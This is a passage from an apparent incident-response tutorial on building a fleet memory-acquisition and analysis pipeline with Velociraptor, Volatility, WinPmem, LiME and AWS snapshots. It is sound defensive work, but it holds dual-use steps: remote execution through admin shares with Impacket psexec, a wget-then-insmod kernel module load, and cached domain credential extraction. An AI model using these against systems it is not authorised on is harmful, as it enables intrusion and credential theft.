run: |\n          psql -h localhost -U analyst -d memory_analysis -f init_db.sql\n\n      - name: Run unit tests\n        env:\n          CELERY_BROKER_URL: redis:\/\/localhost:6379\/0\n          POSTGRES_URL: postgresql:\/\/analyst:testpassword@localhost\/memory_analysis\n        run: |\n          pytest tests\/ -v --tb=short\n\n      - name: Test pipeline task imports\n        env:\n          CELERY_BROKER_URL: redis:\/\/localhost:6379\/0\n          POSTGRES_URL: postgresql:\/\/analyst:testpassword@localhost\/memory_analysis\n        run: |\n          python3 -c \"\n          from pipeline.pipeline import (\n              validate_image, run_triage, run_deep_analysis,\n              extract_iocs, generate_report\n          )\n          print('All pipeline tasks imported successfully')\n          \"<\/pre>\n<h3>Operational runbook: running the pipeline during an active incident<\/h3>\n<p>All of the above infrastructure is built to run with minimal manual intervention during an incident. The following runbook describes the complete workflow from initial decision to collect through to analyst review of results.<\/p>\n<pre>## MEMORY COLLECTION RUNBOOK\n## Version: 1.0 | Last Updated: 2026-01\n\n## PHASE 1: DECISION AND SCOPING (5 minutes)\n##\n## 1. Run network impact estimation\npython3 \/srv\/memory\/network_impact.py \\\n    --tier1-count 2 --tier1-ram 64 \\\n    --tier2-count 10 --tier2-ram 32 \\\n    --tier3-count 38 --tier3-ram 16 \\\n    --link-speed-mbps 1000 \\\n    --max-utilisation 0.30\n\n## 2. Verify analysis server capacity\ndf -h \/srv\/memory\/landing          # Check storage available\nfree -h                            # Check RAM\nnproc                              # Check CPU count\n\n## 3. Verify pipeline is running\ncd \/srv\/memory &amp;&amp; docker-compose ps\nsystemctl status memory-watcher\n\n## PHASE 2: CONFIGURE AND LAUNCH COLLECTION (10 minutes)\n##\n## 4. 
Update target list for this incident\ncat &gt; \/srv\/memory\/targets_$(date +%Y%m%d).json &lt;&lt; &#039;TARGETS&#039;\n{\n  &quot;incident_id&quot;: &quot;INC-2026-001&quot;,\n  &quot;started_at&quot;:  &quot;2026-05-15T09:00:00Z&quot;,\n  &quot;targets&quot;: [\n    {&quot;hostname&quot;: &quot;DC01&quot;,     &quot;client_id&quot;: &quot;C.xxx&quot;, &quot;tier&quot;: 1, &quot;ram_gb&quot;: 64, &quot;priority&quot;: true},\n    {&quot;hostname&quot;: &quot;DC02&quot;,     &quot;client_id&quot;: &quot;C.yyy&quot;, &quot;tier&quot;: 1, &quot;ram_gb&quot;: 64},\n    {&quot;hostname&quot;: &quot;FILE01&quot;,   &quot;client_id&quot;: &quot;C.zzz&quot;, &quot;tier&quot;: 2, &quot;ram_gb&quot;: 32},\n    {&quot;hostname&quot;: &quot;WS-JOHN&quot;,  &quot;client_id&quot;: &quot;C.aaa&quot;, &quot;tier&quot;: 3, &quot;ram_gb&quot;: 16, &quot;priority&quot;: true}\n  ]\n}\nTARGETS\n\n## 5. Launch orchestrated collection\npython3 \/srv\/memory\/collection_orchestrator.py \\\n    --targets \/srv\/memory\/targets_$(date +%Y%m%d).json \\\n    --config \/etc\/velociraptor\/server.config.yaml\n\n## PHASE 3: MONITOR PROGRESS (ongoing)\n##\n## 6. Watch pipeline status\nwatch -n 30 &#039;psql postgresql:\/\/analyst:changeme@localhost\/memory_analysis \\\n    -c &quot;SELECT hostname, status, risk_score FROM memory_images \\\n        LEFT JOIN triage_results tr ON tr.image_id=memory_images.id \\\n        ORDER BY risk_score DESC NULLS LAST;&quot;&#039;\n\n## 7. Open analyst dashboard\necho &quot;Dashboard: http:\/\/$(hostname -I | awk &#039;{print $1}&#039;):8080&quot;\necho &quot;Celery monitor: http:\/\/$(hostname -I | awk &#039;{print $1}&#039;):5555&quot;\n\n## 8. Monitor network utilisation on analysis server\nsar -n DEV 5 | grep eth0\n\n## PHASE 4: TRIAGE RESULTS AS THEY ARRIVE (ongoing)\n##\n## 9. 
Query for completed high-risk hosts immediately\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis &lt;&lt; 'QUERY'\nSELECT mi.hostname, tr.risk_score\nFROM memory_images mi\nJOIN triage_results tr ON tr.image_id = mi.id\nWHERE tr.risk_score &gt;= 20\n  AND mi.status = 'complete'\nORDER BY tr.risk_score DESC;\nQUERY\n\n## 10. Run fleet correlation once 50%+ of images are complete\npython3 \/srv\/memory\/cross_correlation.py\n\n## 11. Review fleet report\ncat \/srv\/memory\/reports\/fleet_correlation.json | python3 -m json.tool | head -100\n\n## PHASE 5: DEEP DIVE ON PRIORITY HOSTS\n##\n## 12. For any CRITICAL host, run additional Volatility plugins manually\nIMAGE=$(psql postgresql:\/\/analyst:changeme@localhost\/memory_analysis \\\n    -t -c \"SELECT image_path FROM memory_images WHERE hostname='DC01';\" | tr -d ' ')\n\nsource \/opt\/vol3-env\/bin\/activate\n\n# Additional plugins not in the automated pipeline\nvol -f $IMAGE windows.cmdline           # All process command lines\nvol -f $IMAGE windows.dlllist --pid 123 # DLLs in specific PID\nvol -f $IMAGE windows.handles --pid 123 # Open handles\nvol -f $IMAGE windows.svcscan           # Service enumeration\nvol -f $IMAGE windows.drivermodule      # Kernel driver verification\nvol -f $IMAGE windows.timers            # Kernel timer objects (rootkit indicator)\nvol -f $IMAGE windows.registry.hivescan # Registry hive locations\nvol -f $IMAGE windows.cachedump         # Cached domain logon credentials<\/pre>\n<h3>Storage management and image lifecycle<\/h3>\n<p>Memory images are large. Fifty images from a typical enterprise investigation consume between 500GB and 2TB of storage. 
Without lifecycle management the analysis server fills up, and raw memory images contain sensitive data (credentials, encryption keys, personal information from user sessions) that should not persist indefinitely.<\/p>\n<pre>## storage_lifecycle.py - Automated image lifecycle management\n\n#!\/usr\/bin\/env python3\n\"\"\"\nManages memory image storage lifecycle:\n- Moves completed images to cold storage after analysis\n- Archives reports to long-term storage\n- Securely deletes raw images after retention period\n- Compresses reports for long-term retention\n\"\"\"\n\nimport os\nimport shutil\nimport logging\nimport psycopg2\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\nlog = logging.getLogger(__name__)\nPOSTGRES_URL = 'postgresql:\/\/analyst:changeme@localhost\/memory_analysis'\n\n# Configuration\nHOT_STORAGE    = Path('\/srv\/memory\/landing')       # Fast NVMe\nCOLD_STORAGE   = Path('\/srv\/memory\/archive')        # Slower HDD\nREPORT_ARCHIVE = Path('\/srv\/memory\/reports\/archive')\nRETENTION_DAYS = 90  # Keep raw images for 90 days after analysis complete\n\ndef get_db():\n    return psycopg2.connect(POSTGRES_URL)\n\ndef move_to_cold_storage():\n    \"\"\"Move completed and analysed images to slower cold storage.\"\"\"\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT id, hostname, image_path\n                FROM memory_images\n                WHERE status = 'complete'\n                  AND image_path LIKE %s\n                  AND received_at &lt; NOW() - INTERVAL &#039;24 hours&#039;\n            &quot;&quot;&quot;, (str(HOT_STORAGE) + &#039;%&#039;,))\n            rows = cur.fetchall()\n\n    for image_id, hostname, image_path in rows:\n        src  = Path(image_path)\n        if not src.exists():\n            continue\n        dest_dir = COLD_STORAGE \/ hostname\n        dest_dir.mkdir(parents=True, exist_ok=True)\n        dest = dest_dir \/ src.name\n\n      
  log.info(f&quot;Moving {hostname} image to cold storage: {src.stat().st_size \/ 1e9:.1f}GB&quot;)\n        shutil.move(str(src), str(dest))\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\n                    &quot;UPDATE memory_images SET image_path = %s WHERE id = %s&quot;,\n                    (str(dest), image_id)\n                )\n            conn.commit()\n\ndef purge_expired_images():\n    &quot;&quot;&quot;Delete raw images older than the retention period (best-effort wipe).&quot;&quot;&quot;\n    cutoff = datetime.now() - timedelta(days=RETENTION_DAYS)\n\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(&quot;&quot;&quot;\n                SELECT id, hostname, image_path\n                FROM memory_images\n                WHERE status = &#039;complete&#039;\n                  AND received_at &lt; %s\n                  AND image_path IS NOT NULL\n            &quot;&quot;&quot;, (cutoff,))\n            rows = cur.fetchall()\n\n    for image_id, hostname, image_path in rows:\n        img = Path(image_path)\n        if not img.exists():\n            continue\n\n        size_gb = img.stat().st_size \/ 1e9\n        log.info(f&quot;Purging expired image: {hostname} ({size_gb:.1f}GB, ID {image_id})&quot;)\n\n        # Best-effort wipe: only the first 1MB is overwritten, so most of the image\n        # data remains on disk until the underlying blocks are reused.\n        # On SSDs even a full overwrite is unreliable - keep raw images on an\n        # encrypted volume rather than relying on this step for sanitisation\n        try:\n            with open(img, &#039;r+b&#039;) as f:\n                length = os.path.getsize(img)\n                f.write(os.urandom(min(length, 1024 * 1024)))  # Overwrite first 1MB\n                f.flush()\n                os.fsync(f.fileno())  # Force the overwrite to disk before unlinking\n            img.unlink()\n            log.info(f&quot;Purged: {hostname}&quot;)\n        except Exception as e:\n            log.error(f&quot;Purge failed for {hostname}: {e}&quot;)\n            continue\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\n                    
&quot;UPDATE memory_images SET image_path = NULL, status = &#039;purged&#039; WHERE id = %s&quot;,\n                    (image_id,)\n                )\n            conn.commit()\n\ndef archive_reports():\n    &quot;&quot;&quot;Compress and archive reports older than 7 days.&quot;&quot;&quot;\n    import tarfile\n    cutoff = datetime.now() - timedelta(days=7)\n    REPORT_ARCHIVE.mkdir(parents=True, exist_ok=True)\n\n    for report_dir in Path(&#039;\/srv\/memory\/reports&#039;).iterdir():\n        if not report_dir.is_dir() or report_dir == REPORT_ARCHIVE:\n            continue\n        mtime = datetime.fromtimestamp(report_dir.stat().st_mtime)\n        if mtime &lt; cutoff:\n            archive_name = REPORT_ARCHIVE \/ f&quot;{report_dir.name}_{mtime.strftime(&#039;%Y%m%d&#039;)}.tar.gz&quot;\n            with tarfile.open(archive_name, &#039;w:gz&#039;) as tar:\n                tar.add(report_dir, arcname=report_dir.name)\n            shutil.rmtree(report_dir)\n            log.info(f&quot;Archived reports for {report_dir.name}&quot;)\n\nif __name__ == &#039;__main__&#039;:\n    logging.basicConfig(level=logging.INFO, format=&#039;%(asctime)s %(levelname)s %(message)s&#039;)\n    log.info(&quot;Running storage lifecycle management&quot;)\n    move_to_cold_storage()\n    purge_expired_images()\n    archive_reports()\n    log.info(&quot;Storage lifecycle complete&quot;)<\/pre>\n<pre>## Cron schedule for lifecycle management\n## Add to \/etc\/cron.d\/memory-pipeline\n\n# Run lifecycle management at 3am daily\n0 3 * * * analyst \/opt\/vol3-env\/bin\/python3 \/srv\/memory\/storage_lifecycle.py &gt;&gt; \/srv\/memory\/logs\/lifecycle.log 2&gt;&amp;1\n\n# Compile and deploy Yara rules at midnight\n0 0 * * * analyst \/opt\/vol3-env\/bin\/python3 \/srv\/memory\/compile_rules.py &gt;&gt; \/srv\/memory\/logs\/rules.log 2&gt;&amp;1\n\n# Run fleet correlation every 2 hours during business hours\n0 8,10,12,14,16,18 * * 1-5 analyst \/opt\/vol3-env\/bin\/python3 
\/srv\/memory\/cross_correlation.py &gt;&gt; \/srv\/memory\/logs\/correlation.log 2&gt;&amp;1<\/pre>\n<h3>Performance tuning and benchmarks<\/h3>\n<p>With the full pipeline running, the throughput you can expect depends on your analysis server hardware. The script below times each Volatility plugin against a test image. Its capacity estimates were written for a test deployment with 32 cores, 128GB RAM, and NVMe storage, and assume roughly four cores per image under analysis; adjust both figures to match your own server.<\/p>\n<pre>## Pipeline performance benchmark script\n## Run this against a test image to measure your pipeline throughput\n\n#!\/usr\/bin\/env python3\nimport subprocess, time, json\nfrom pathlib import Path\n\ndef benchmark_volatility_plugins(image_path: str):\n    plugins = [\n        ('windows.pslist',    'Process list'),\n        ('windows.netscan',   'Network connections'),\n        ('windows.malfind',   'Injection detection'),\n        ('windows.callbacks', 'Kernel callbacks'),\n        ('windows.cmdline',   'Command lines'),\n        ('windows.dlllist',   'Module list'),\n    ]\n\n    print(f\"Benchmarking Volatility 3 against: {image_path}\")\n    print(f\"Image size: {Path(image_path).stat().st_size \/ 1e9:.1f} GB\\n\")\n    print(f\"{'Plugin':&lt;30} {&#039;Time (s)&#039;:&lt;12} {&#039;Records&#039;:&lt;10}&quot;)\n    print(&quot;-&quot; * 55)\n\n    total_time = 0\n    for plugin, description in plugins:\n        start = time.time()\n        result = subprocess.run(\n            [&#039;\/opt\/vol3-env\/bin\/vol&#039;, &#039;-f&#039;, image_path,\n             &#039;--renderer&#039;, &#039;json&#039;, plugin],\n            capture_output=True, text=True, timeout=600\n        )\n        elapsed = time.time() - start\n        total_time += elapsed\n\n        try:\n            data = json.loads(result.stdout)\n            count = len(data.get(&#039;rows&#039;, data)) if isinstance(data, dict) else len(data)\n        except (ValueError, TypeError):  # Non-JSON or unexpected renderer output\n            count = 0\n\n        print(f&quot;{plugin:&lt;30} {elapsed:&lt;12.1f} {count:&lt;10}&quot;)\n\n    print(&quot;-&quot; * 55)\n    print(f&quot;{&#039;TOTAL&#039;:&lt;30} 
{total_time:&lt;12.1f}&quot;)\n    print(f&quot;\\nFull triage pipeline: ~{total_time\/60:.1f} minutes per image&quot;)\n    print(f&quot;Parallel capacity (32 cores): ~{int(32 \/ 4)} images simultaneously&quot;)\n    print(f&quot;Estimated fleet throughput: ~{int((32\/4) * (3600\/total_time))} images\/hour&quot;)\n\nif __name__ == &#039;__main__&#039;:\n    import sys\n    if len(sys.argv) &lt; 2:\n        print(&quot;Usage: benchmark.py &lt;image_path&gt;&quot;)\n        sys.exit(1)\n    benchmark_volatility_plugins(sys.argv[1])<\/pre>\n<h3>Putting the complete pipeline together<\/h3>\n<p>Everything described in this post forms a coherent system when deployed together. Velociraptor provides the collection layer with configurable throttling and tiered concurrency to protect the production network. The image watcher provides the trigger layer, detecting new images and starting the processing chain without manual intervention. Celery and the task pipeline provide the processing layer, automatically running triage and deep analysis in sequence and storing structured results in PostgreSQL. Cross-image correlation provides the intelligence layer, connecting findings across all machines to identify the full scope of an intrusion. The Flask dashboard provides the analyst interface for reviewing results under incident pressure. GitHub Actions provides the operational layer, keeping the Yara ruleset current and deployed without manual SSH sessions.<\/p>\n<p>The network protection considerations are baked into every collection decision: tiered concurrency limits based on available bandwidth, per-client throttling, QoS marking for de-prioritisation under load, and off-hours scheduling for non-urgent collections. 
A well-tuned deployment of this pipeline running on a 1Gbps network can collect from 50 endpoints within a six-to-eight hour window while keeping collection-related bandwidth below 30% of the available link capacity throughout.<\/p>\n<p>The most important principle in fleet memory analysis is that speed matters but correctness matters more. A partial or interrupted memory image is worse than no image because it gives false confidence. The validation stage in the pipeline exists for a reason: verifying SHA256 and image size before analysis starts catches failed transfers early rather than after significant CPU time has been spent on an incomplete image. Never skip validation under time pressure.<\/p>\n<p>Everything here is designed to be adapted. Your environment has different endpoint counts, different network topology, different hardware constraints, and different Velociraptor deployment configurations than the examples used throughout. The scripts are starting points rather than finished products. The architecture, the tiering logic, the processing stages, and the correlation approach are the durable parts. The specific Python code is intended to give you a working foundation to build from rather than a drop-in solution that works without modification.<\/p>\n<h3>Alternative collection method 1: WinPmem standalone (no agent required)<\/h3>\n<p>Velociraptor is the right answer when you have agents deployed. When you do not, whether because the endpoint was newly discovered, because the Velociraptor agent failed, or because you are working in an environment where agent deployment is not possible, WinPmem can be run directly as a standalone executable with no installation required. It is a single binary, runs from a USB drive or a UNC path, and produces a raw memory image that the analysis pipeline accepts without modification.<\/p>\n<p>The critical operational detail with standalone WinPmem is output staging. 
Avoid writing the image to the target system&#8217;s own disk where possible. If you write a 16GB image to C:\\Windows\\Temp you are adding 16GB of write activity to a potentially compromised system, potentially overwriting slack space that contains forensic evidence, and relying on the target disk having enough free space. Writing directly to a network share or an external drive avoids all of these problems.<\/p>\n<pre>## WinPmem standalone collection\n## Download: https:\/\/github.com\/Velocidex\/WinPmem\/releases\n\n## Option 1: Write directly to a network share (preferred)\n## The share should be on your analysis server, write-only for the target\n\n# On the analysis server - create the collection share\n# Note: CHANGE grants read, write and delete at share level; restrict further\n# with NTFS permissions so targets cannot read or delete other images\nnet share MemCollection=C:\\MemCollection \/GRANT:\"Everyone,CHANGE\"\n# Or on Linux analysis server via Samba:\n# [MemCollection]\n# path = \/srv\/memory\/landing\n# writable = yes\n# create mask = 0644\n# ; Enable guest access only on an isolated IR network\n# guest ok = yes\n\n## On the target Windows system (run as Administrator):\nwinpmem_mini_x64.exe \\\\analysis-server\\MemCollection\\%COMPUTERNAME%_%DATE:~-4%%DATE:~3,2%%DATE:~0,2%.raw\n\n## Option 2: Write locally then transfer (when network share unavailable)\nwinpmem_mini_x64.exe C:\\Windows\\Temp\\mem.raw\n\n## Transfer with throttled robocopy: \/IPG:n inserts an n-millisecond gap between\n## packets; the resulting rate depends on the link, so raise n to throttle harder\nrobocopy C:\\Windows\\Temp \\\\analysis-server\\MemCollection mem.raw \/J \/IPG:1\n\n## Option 3: Pipe directly to compressed output (reduces disk footprint)\n## Requires a gzip build on the target; Windows does not ship one\nwinpmem_mini_x64.exe - | gzip -1 &gt; \\\\analysis-server\\MemCollection\\%COMPUTERNAME%.raw.gz\n\n## Wrapper script for multiple standalone targets\n## Runs on the Linux analysis server, using smbclient and Impacket psexec for remote execution\n\n#!\/usr\/bin\/env python3\n\"\"\"\nStandalone WinPmem deployment script for environments without Velociraptor.\nCopies WinPmem to target via admin share, runs acquisition, transfers image.\n\"\"\"\n\nimport subprocess\nimport time\nimport logging\nfrom pathlib import 
Path\nfrom datetime import datetime\nimport os\n\nlog = logging.getLogger(__name__)\n\nWINPMEM_PATH   = '\/srv\/memory\/tools\/winpmem_mini_x64.exe'\nLANDING_DIR    = '\/srv\/memory\/landing'\nIR_USER        = 'domain\/iruser'  # Placeholder account; password comes from the environment\n\ndef collect_standalone(hostname: str, ram_gb: float = 16) -&gt; bool:\n    \"\"\"Deploy WinPmem to a target and collect memory.\"\"\"\n\n    timestamp   = datetime.now().strftime('%Y%m%d_%H%M%S')\n    output_name = f\"{hostname}_{timestamp}.raw\"\n    local_dest  = f\"{LANDING_DIR}\/{output_name}\"\n\n    log.info(f\"Starting standalone collection from {hostname}\")\n\n    # Step 1: Copy WinPmem to target via admin share\n    copy_cmd = [\n        'smbclient', f'\/\/{hostname}\/C$',\n        '-A', '\/etc\/memory-ir\/smb.auth',  # credentials file\n        '-c', f'put {WINPMEM_PATH} Windows\\\\Temp\\\\winpmem.exe'\n    ]\n    result = subprocess.run(copy_cmd, capture_output=True, text=True, timeout=60)\n    if result.returncode != 0:\n        log.error(f\"Failed to copy WinPmem to {hostname}: {result.stderr}\")\n        return False\n\n    # Step 2: Execute WinPmem remotely via Impacket psexec\n    # Impacket target syntax is DOMAIN\/user:password@host; the password is read from\n    # the IR_PASSWORD environment variable (an assumption - use a vault in production)\n    # Estimate time: roughly 1 minute per 4GB of RAM at ~70MB\/s write speed\n    timeout = int((ram_gb \/ 4) * 60) + 120\n    password = os.environ['IR_PASSWORD']\n    exec_cmd = [\n        'impacket-psexec',\n        f'{IR_USER}:{password}@{hostname}',\n        f'C:\\\\Windows\\\\Temp\\\\winpmem.exe C:\\\\Windows\\\\Temp\\\\mem_ir.raw'\n    ]\n    log.info(f\"Running WinPmem on {hostname} (estimated {timeout\/\/60} min)\")\n    try:\n        result = subprocess.run(exec_cmd, capture_output=True, text=True, timeout=timeout)\n    except subprocess.TimeoutExpired:\n        log.error(f\"WinPmem timed out on {hostname} after {timeout}s\")\n        return False\n    if result.returncode != 0:\n        log.error(f\"WinPmem execution failed on {hostname}: {result.stderr}\")\n        return False\n\n    # Step 3: Transfer the image back\n    log.info(f\"Transferring image from {hostname}\")\n    transfer_cmd = [\n        
'smbclient', f'\/\/{hostname}\/C$',\n        '-A', '\/etc\/memory-ir\/smb.auth',\n        '-c', f'get Windows\\\\Temp\\\\mem_ir.raw {local_dest}'\n    ]\n    result = subprocess.run(transfer_cmd, capture_output=True, text=True,\n                            timeout=7200)  # 2 hour timeout for transfer\n    if result.returncode != 0:\n        log.error(f\"Transfer failed from {hostname}: {result.stderr}\")\n        return False\n\n    # Step 4: Clean up temp files on target\n    cleanup_cmd = [\n        'smbclient', f'\/\/{hostname}\/C$',\n        '-A', '\/etc\/memory-ir\/smb.auth',\n        '-c', 'del Windows\\\\Temp\\\\winpmem.exe; del Windows\\\\Temp\\\\mem_ir.raw'\n    ]\n    subprocess.run(cleanup_cmd, capture_output=True, timeout=30)\n\n    log.info(f\"Standalone collection complete: {local_dest}\")\n    return True<\/pre>\n<h3>Alternative collection method 2: LiME for Linux endpoints<\/h3>\n<p>Linux memory acquisition requires a different approach because there is no WinPmem equivalent that works across all kernel versions without compilation. LiME (Linux Memory Extractor) is a loadable kernel module that, when inserted, exposes physical memory through a network socket or a local file. The challenge is that LiME must be compiled against the exact kernel version running on the target, which means maintaining a library of pre-compiled modules or building on demand.<\/p>\n<p>The build-on-demand approach is more maintainable for a fleet where kernel versions vary across different distro versions and patch levels. 
A build server with Docker can compile the correct LiME module for a target kernel in under two minutes, provided the headers for that exact kernel version are available from the package repositories of the container image used (ideally the same distribution and release as the target).<\/p>\n<pre>## LiME build server setup\n## Builds LiME modules for specific kernel versions on demand\n\n#!\/bin\/bash\n## build_lime.sh - Build LiME for a specific kernel version\n## Usage: .\/build_lime.sh 5.15.0-91-generic ubuntu:22.04\n\nset -euo pipefail\n\nKERNEL_VERSION=${1:?usage: build_lime.sh KERNEL_VERSION [DOCKER_IMAGE]}\nDOCKER_IMAGE=${2:-ubuntu:22.04}\nOUTPUT_DIR=\/srv\/memory\/lime_modules\n\nmkdir -p $OUTPUT_DIR\n\ndocker run --rm \\\n    -v $OUTPUT_DIR:\/output \\\n    -e KERNEL_VERSION=$KERNEL_VERSION \\\n    $DOCKER_IMAGE bash -c \"\n        set -e\n        apt-get update -qq\n        apt-get install -y -qq \\\n            linux-headers-$KERNEL_VERSION \\\n            build-essential \\\n            git 2&gt;\/dev\/null\n\n        git clone --depth 1 https:\/\/github.com\/504ensicsLabs\/LiME \/tmp\/lime\n        cd \/tmp\/lime\/src\n\n        make -C \/lib\/modules\/$KERNEL_VERSION\/build M=\\$(pwd) modules\n        cp lime.ko \/output\/lime-$KERNEL_VERSION.ko\n        echo '[+] Built: lime-$KERNEL_VERSION.ko'\n    \"\n\necho \"Module available at: $OUTPUT_DIR\/lime-$KERNEL_VERSION.ko\"<\/pre>\n<pre>## Linux memory collection script using LiME\n## Run as root on the target Linux system\n\n#!\/bin\/bash\n## collect_linux_memory.sh\n\nset -euo pipefail\n\nANALYSIS_SERVER=\"192.168.1.100\"\nCOLLECTION_PORT=\"4444\"\nKERNEL_VER=$(uname -r)\nHOSTNAME=$(hostname -s)\nTIMESTAMP=$(date +%Y%m%d_%H%M%S)\nMODULE_DIR=\"\/tmp\/lime_modules\"\nOUTPUT_FILE=\"\/tmp\/mem_${HOSTNAME}_${TIMESTAMP}.lime\"\n\necho \"[*] Linux memory collection starting\"\necho \"    Hostname: $HOSTNAME\"\necho \"    Kernel:   $KERNEL_VER\"\necho \"    RAM:      $(free -h | awk '\/^Mem:\/{print $2}')\"\n\n# Check if pre-built module exists locally\nif [ -f \"$MODULE_DIR\/lime-$KERNEL_VER.ko\" ]; then\n    echo \"[*] Using pre-built module\"\n    LIME_MODULE=\"$MODULE_DIR\/lime-$KERNEL_VER.ko\"\nelse\n    echo \"[*] Fetching pre-built module from build 
server\"\n    mkdir -p $MODULE_DIR\n    wget -q \"http:\/\/$ANALYSIS_SERVER:8888\/lime\/lime-$KERNEL_VER.ko\" \\\n        -O \"$MODULE_DIR\/lime-$KERNEL_VER.ko\" 2&gt;\/dev\/null || {\n        # wget -O leaves an empty file behind on failure; remove it\n        rm -f \"$MODULE_DIR\/lime-$KERNEL_VER.ko\"\n        echo \"[!] Module not available for kernel $KERNEL_VER\"\n        echo \"[!] Build it first: .\/build_lime.sh $KERNEL_VER\"\n        exit 1\n    }\n    LIME_MODULE=\"$MODULE_DIR\/lime-$KERNEL_VER.ko\"\nfi\n\n# Option A: Acquire to file then transfer (for large images or slow networks)\necho \"[*] Acquiring memory to local file\"\ninsmod $LIME_MODULE \"path=$OUTPUT_FILE format=lime timeout=0\"\nrmmod lime\n\necho \"[*] Image size: $(du -sh $OUTPUT_FILE | cut -f1)\"\necho \"[*] SHA256: $(sha256sum $OUTPUT_FILE | cut -d' ' -f1)\"\n\n# Transfer over SSH, throttled with pv to avoid network saturation\n# pv -L 50m caps the rate at ~50MiB\/s (~420Mbps); lower it (e.g. 35m) to stay\n# under 30% of a 1Gbps link. Replace pv with cat if pv is unavailable\necho \"[*] Transferring to analysis server\"\npv -L 50m \"$OUTPUT_FILE\" | \\\n    ssh analyst@$ANALYSIS_SERVER \\\n    \"cat &gt; \/srv\/memory\/landing\/${HOSTNAME}_${TIMESTAMP}.lime\"\n\n# Clean up local staging file\nrm -f \"$OUTPUT_FILE\" \"$LIME_MODULE\"\necho \"[+] Collection complete\"\n\n# Option B: Acquire directly over network (no local disk needed)\n# Useful when target disk is nearly full or disk write should be avoided\n# In TCP mode LiME listens on the target, so load it there first:\n# insmod lime.ko \"path=tcp:4444 format=lime\"\n# Then connect from the analysis server and save the stream:\n# nc TARGET_IP 4444 &gt; hostname_timestamp.lime\n# Memory is streamed directly to the analysis server, unencrypted<\/pre>\n<pre>## Velociraptor artefact for Linux memory collection\n## Handles module deployment and acquisition automatically\n\nname: Custom.Linux.Memory.Acquire\ndescription: |\n    Acquires Linux physical memory using LiME.\n    Downloads the correct kernel module from the build server,\n    loads it, captures memory, and uploads to Velociraptor server.\n\ntype: CLIENT\nparameters:\n  - name: BuildServerURL\n    description: URL of the LiME module build\/distribution server\n    default: 
\"http:\/\/192.168.1.100:8888\/lime\"\n  - name: ThrottleMBps\n    description: Transfer throttle in MB\/s\n    default: \"10\"\n    type: int\n\nsources:\n  - name: LinuxMemoryAcquisition\n    query: |\n        LET kernel_version = shell(cmd=\"uname -r\", sep=\"\\n\")[0].Stdout\n        LET hostname = info().Fqdn\n        LET timestamp = format(format=\"%d\", args=[now()])\n        LET module_url = format(format=\"%v\/lime-%v.ko\",\n                                args=[BuildServerURL, kernel_version])\n        LET module_path = \"\/tmp\/lime_ir.ko\"\n        LET output_path = format(format=\"\/tmp\/mem_%v_%v.lime\",\n                                 args=[hostname, timestamp])\n\n        -- Download the LiME module for this kernel\n        LET download = SELECT * FROM http_client(\n            url=module_url,\n            method=\"GET\",\n            output=module_path\n        )\n\n        -- Load LiME and capture memory\n        LET capture = SELECT * FROM execve(argv=[\n            \"insmod\", module_path,\n            format(format=\"path=%v format=lime timeout=0\", args=[output_path])\n        ])\n\n        -- Unload module\n        LET unload = SELECT * FROM execve(argv=[\"rmmod\", \"lime\"])\n\n        -- Upload and clean up\n        SELECT\n            upload(path=output_path,\n                   name=format(format=\"%v_%v.lime\", args=[hostname, timestamp])) AS Upload,\n            execve(argv=[\"rm\", \"-f\", output_path, module_path]) AS Cleanup\n        FROM scope()<\/pre>\n<h3>Alternative collection method 3: cloud-native collection (AWS and Azure)<\/h3>\n<p>Cloud instances present a fundamentally different collection challenge. You cannot insert a kernel module into an EC2 instance without kernel headers matching the exact AMI version. Network egress costs make large file transfers expensive. 
Snapshot-based collection avoids both problems by having the cloud platform write memory state to block storage and capturing that storage through the provider&#8217;s own APIs, without loading any tooling onto the instance. The trade-off is that the instance has to be stopped while this happens.<\/p>\n<p>AWS does not offer a direct memory-snapshot API for EC2. The workaround is hibernation: when an instance that was launched with hibernation enabled is stopped with Hibernate=True, the contents of RAM are written to its encrypted root EBS volume (on Windows, as the hibernation file hiberfil.sys), and that volume can then be captured with an ordinary EBS snapshot via CreateSnapshot. The script below uses this route for Windows instances. For Linux, the approach is to use the SSM agent to run a LiME collection script directly on the instance, similar to the standalone approach.<\/p>\n<pre>## AWS EC2 memory collection via snapshot\n## Requires: boto3, appropriate IAM permissions\n\n#!\/usr\/bin\/env python3\n\"\"\"\nCloud-native memory collection for AWS EC2 instances.\nUses EC2 Snapshot for Windows (requires hibernation enabled)\nand SSM Run Command + LiME for Linux instances.\n\"\"\"\n\nimport boto3\nimport time\nimport json\nimport logging\nfrom datetime import datetime\nfrom typing import Optional\n\nlog = logging.getLogger(__name__)\n\ndef collect_windows_ec2_snapshot(\n    instance_id: str,\n    region:      str = 'ap-southeast-2',\n    s3_bucket:   str = 'ir-memory-collection'\n) -&gt; Optional[str]:\n    \"\"\"\n    Capture Windows EC2 memory via hibernation snapshot.\n    NOTE: Instance must have hibernation enabled at launch time.\n    WARNING: This stops the instance temporarily.\n    \"\"\"\n    ec2 = boto3.client('ec2', region_name=region)\n\n    log.warning(f\"Starting hibernation snapshot for {instance_id}\")\n    log.warning(\"This will STOP the instance temporarily\")\n\n    # Tag the instance for IR tracking\n    ec2.create_tags(\n        Resources=[instance_id],\n        Tags=[\n            {'Key': 'IR-Collection', 'Value': datetime.now().isoformat()},\n            {'Key': 'IR-Status', 'Value': 'collecting'}\n        ]\n    )\n\n    # Stop with hibernation to preserve memory state in EBS\n    response = ec2.stop_instances(\n        
